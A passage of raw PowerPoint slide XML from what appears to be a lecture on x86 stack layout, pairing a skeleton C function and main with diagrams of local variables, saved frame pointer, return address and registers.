          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2398000" y="4669925"/>
            <a:ext cx="3444600" cy="534900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="412" name="Shape 412"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2405875" y="5149675"/>
            <a:ext cx="3413400" cy="63000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Shape 413"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8205050" y="3275000"/>
            <a:ext cx="882900" cy="307500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ESP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="414" name="Shape 414"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="413" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7992350" y="3428750"/>
            <a:ext cx="212700" cy="39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Shape 419"/>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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>x86 Stack Details</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="Shape 420"/>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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The compiled assembly code will then jump</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>into the function's code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>int function(char *buf){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  int var1 = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  char buf2[4];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  // some code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  return auth_flag;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>int main(int argc, char *argv[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  if(function(argv[1]) )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>	  // do something</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Shape 421"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941969" y="1757700"/>
            <a:ext cx="2050200" cy="4770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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:b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l">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rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>saved frame pointer (SFP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>return address (ret)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>*buf (function's argument)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main()'s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="422" name="Shape 422"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754739" y="6295550"/>
            <a:ext cx="1448100" cy="354000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[high memory]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="423" name="Shape 423"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754739" y="1571150"/>
            <a:ext cx="1448100" cy="354000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[low memory]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="424" name="Shape 424"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1808250" y="2758900"/>
            <a:ext cx="1470600" cy="141600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="Shape 425"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3278850" y="2523100"/>
            <a:ext cx="2319300" cy="377400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$EIP will point here (roughly)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426" name="Shape 426"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8205050" y="3275000"/>
            <a:ext cx="882900" cy="307500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ESP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="427" name="Shape 427"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="426" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7992350" y="3428750"/>
            <a:ext cx="212700" cy="39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Shape 432"/>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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>x86 Stack Details</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433" name="Shape 433"/>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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var 1 will get pushed onto the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>int function(char *buf){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  int var1 = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  char buf2[4];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  // some code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  return auth_flag;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>int main(int argc, char *argv[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  if(function(argv[1]) )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>	  // do something</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="Shape 434"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941969" y="1757700"/>
            <a:ext cx="2050200" cy="4770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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>var1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>saved frame pointer (SFP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>return address (ret)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>*buf (function's argument)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
